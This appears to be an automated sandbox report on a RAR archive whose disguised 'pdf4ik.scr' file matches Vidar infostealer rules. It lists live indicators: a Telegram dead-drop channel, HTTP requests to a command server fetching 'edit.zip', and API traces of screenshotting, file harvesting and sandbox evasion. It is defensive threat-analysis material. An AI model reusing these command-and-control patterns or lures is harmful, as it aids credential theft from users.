                  Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000002.1469379781.000002C74D244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/:
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/X
                  Source: pdf4ik.scr, pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2424739839.000000002BAB0000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000003.2359804569.0000000001607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/zaskullz
                  Source: pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/zaskullzfunkstaredit.zipMozilla/5.0
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                  Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000002.1469379781.000002C74D244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                  Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/88.0.1/releasenotes
                  Source: unknownDNS traffic detected: queries for: t.me
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D91560 DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,12_2_29D91560
                  Source: global trafficHTTP traffic detected: GET /zaskullz HTTP/1.1X-Id: 14ac9d852bc10b98f94de36f839b2f59User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1X-Id: 14ac9d852bc10b98f94de36f839b2f59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37Host: 116.203.13.130
                  Source: global trafficHTTP traffic detected: GET /edit.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37Host: 116.203.13.130Cache-Control: no-cache
                  Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49732 version: TLS 1.2
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA50A0 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,12_2_29DA50A0

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 12.0.pdf4ik.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                  Source: 12.0.pdf4ik.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 1968
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DBF98E12_2_29DBF98E
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9088012_2_29D90880
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D958A012_2_29D958A0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DC184412_2_29DC1844
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DAC84012_2_29DAC840
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DBA81A12_2_29DBA81A
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DAEB7012_2_29DAEB70
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DC0B0C12_2_29DC0B0C
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DABA0012_2_29DABA00
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D8BC6012_2_29D8BC60
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DB9C1512_2_29DB9C15
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DBAC0212_2_29DBAC02
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DABF8012_2_29DABF80
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DBFEDF12_2_29DBFEDF
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D8B1E012_2_29D8B1E0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D8C0E012_2_29D8C0E0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DBA0AA12_2_29DBA0AA
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DBA44812_2_29DBA448
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DC043012_2_29DC0430
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D8D7B012_2_29D8D7B0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D8A7A012_2_29D8A7A0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9C6C012_2_29D9C6C0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: String function: 29D84750 appears 118 times
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: String function: 29DB5A50 appears 44 times
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: String function: 29D89100 appears 66 times
                  Source: C:\Program Files\7-Zip\7zG.exeProcess Stats: CPU usage > 98%
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrMemory allocated: 74C60000 page read and writeJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrMemory allocated: 74C69000 page read and writeJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrMemory allocated: 75D70000 page read and writeJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrMemory allocated: 75D71000 page read and writeJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrMemory allocated: 74510000 page read and writeJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                  Source: unknownProcess created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\pdf_novichki\" -spe -an -ai#7zMap2692:86:7zEvent4577
                  Source: unknownProcess created: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr "C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr" /S
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 1968
                  Source: C:\Windows\System32\OpenWith.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                  Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\FeedbackJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C94.tmpJump to behavior
                  Source: classification engineClassification label: mal80.troj.spyw.evad.winRAR@4/8@1/5
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D8FA90 CoCreateInstance,MultiByteToWideChar,lstrcpyn,12_2_29D8FA90
                  Source: C:\Windows\System32\OpenWith.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA3B10 CreateToolhelp32Snapshot,Process32First,Process32Next,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,Process32Next,CloseHandle,12_2_29DA3B10
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6916
                  Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_02
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: pdf_novichki.rarStatic file information: File size 6238622 > 1048576
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DB5A95 push ecx; ret 12_2_29DB5AA8
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DB07BE push ecx; ret 12_2_29DB07D1
                  Source: pdf4ik.scr.9.drStatic PE information: section name: .eh_fram
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA8390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_29DA8390

                  Persistence and Installation Behavior

                  barindex
                  Drops PE files with a suspicious file extension
                  Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrJump to dropped file
                  Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrJump to dropped file
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA8390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_29DA8390
                  Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Contains functionality to compare user and computer (likely to detect sandboxes)
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA,12_2_29D90880
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrAPI coverage: 7.9 %
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA2E90 GetSystemInfo,12_2_29DA2E90
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9B960 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,12_2_29D9B960
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D93B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,12_2_29D93B60
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA4C40 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_29DA4C40
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9CE80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,12_2_29D9CE80
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D96160 _memset,_memset,SHGetFolderPathA,lstrcatA,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,12_2_29D96160
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D90130 wsprintfA,FindFirstFileA,_memset,lstrcatA,StrCmpCA,StrCmpCA,lstrcpy,lstrcatA,lstrcatA,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,12_2_29D90130
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9E060 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,12_2_29D9E060
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D8F3E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcatA,lstrlenA,12_2_29D8F3E0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9B520 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose,12_2_29D9B520
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D964B0 _memset,SHGetFolderPathA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,SHGetFolderPathA,wsprintfA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,12_2_29D964B0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9E470 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,12_2_29D9E470
